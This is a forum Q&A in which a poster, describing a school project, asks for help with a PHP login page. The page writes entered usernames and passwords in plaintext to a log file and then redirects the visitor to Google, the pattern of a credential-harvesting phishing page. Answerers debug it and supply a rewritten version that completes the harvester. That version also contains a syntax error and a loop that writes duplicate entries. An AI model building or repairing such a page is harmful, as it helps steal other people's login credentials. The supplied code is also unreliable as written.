# PhP scripting for login page?

Tags: javascript, php, html, css, authentication

I'm having trouble doing a login form for my school project.
You see, I'm trying to make a log file using a PhP script, but everytime I input the sample username/password, it creates a log file but the log file is empty.
any suggestions/fix for this?

**My codes:**

```
   <body>
        <div class="form">
    <div class="header"><h2>Sign In</h2></div>
    <div class="login">
    <form action="login.php" method="get">
    <ul>
    <li>
    <span class="un"><i class="fa fa-user"></i></span><input type="text" required class="text" placeholder="User Name Or Email"/></li>
    <li>
    <span class="un"><i class="fa fa-lock"></i></span><input type="password" required class="text" placeholder="User Password"/></li>
    <li>
    <input type="submit" value="LOGIN" class="btn">
    </li>
    <li><div class="span"><span class="ch"><input type="checkbox" id="r"> <label for="r">Remember Me</label> </span> <span class="ch"><a href="#">Forgot Password?</a></span></div></li>
    </ul>
    </form>
    <div class="social">
    <a href="#"><div class="fb"><i class="fa fa-facebook-f"></i> &nbsp; Login With Facebook</div></a>
    <a href="#"><div class="tw"><i class="fa fa-twitter"></i> &nbsp;  Login With Twitter</div></a>
    </div>
    </div><br/>
    <div class="sign">
    <div class="need">Need new account ?</div>
    <div class="up"><a href="">Sign Up</a></div>
    </div>
    </div>
    </body>

**PhP codes**

<?php



header ('Location: http://www.GOOGLE.COM');

$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
 $stringData = "username: " . $_POST['username'] . "\n";
fwrite($fh, $stringData);
$stringData = "password: " . $_POST['password'] . "\n";
fwrite($fh, $stringData);
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
```

Comment: you are posting `username` and `password` but both inputs doesn;t have `name` so how you know which is username and which is password when `post`

Comment: and why you have `header redirection` first before any thing post and in your code where this `$fh` coming from

Answer (score 0):

1. Why is `header ('Location: http://www.GOOGLE.COM');` before the code has been executed? Always place this at the end of your code, as it will run the code, and then redirect.

Change the method="GET" to method="POST" if you are posting the data to the PHP file.

Answer (score 0):

Didn't test it but should work.

The problems were:

1. redirecting before anything can happen
2. lack of name attribute in input tags
3. wrong form method (GET)
4. $handle vs. $fh ?

Btw. how about doing it in a single file ? 
Protip: closing unused file handler is a good practice or else it remains open for a whole request duration.

```
<?php 
if($_SERVER['REQUEST_METHOD'] == 'POST') {


    $fh = fopen("log.txt", "a");
    foreach($_POST as $variable => $value) {
        $stringData = "username: " . $_POST['username'] . "\n";
        fwrite($fh, $stringData);
        $stringData = "password: " . $_POST['password'] . "\n";
        fwrite($fh, $stringData);
    } 
    fclose($fh);

    header ('Location: http://www.google.com');

else {
?>
<html>

    <head>
        ...
    </head>

   <body>


        <div class="form">
            <div class="header"><h2>Sign In</h2></div>
            <div class="login">
                <form method="POST"> <!-- no need for action attribute, as by default it's current URL -->
                    <ul>
                        <li><span class="un"><i class="fa fa-user"></i></span><input type="text" name="username" class="text" placeholder="User Name Or Email" required/></li>
                        <li><span class="un"><i class="fa fa-lock"></i></span><input type="password" name="password" class="text" placeholder="User Password" required/></li>
                        <li><div class="span"><span class="ch"><input type="checkbox" id="r"> <label for="r">Remember Me</label> </span> <span class="ch"><a href="#">Forgot Password?</a></span></div></li>
                        <li><input type="submit" value="LOGIN" class="btn"></li>
                    </ul>
                </form>

                <div class="social">
                    <a href="#"><div class="fb"><i class="fa fa-facebook-f"></i> &nbsp; Login With Facebook</div></a>
                    <a href="#"><div class="tw"><i class="fa fa-twitter"></i> &nbsp;  Login With Twitter</div></a>
                </div>
            </div>
            <br/>

            <div class="sign">
                <div class="need">Need new account ?</div>
                <div class="up"><a href="">Sign Up</a></div>
            </div>
        </div>

    </body>
</html>
<?php }?>
```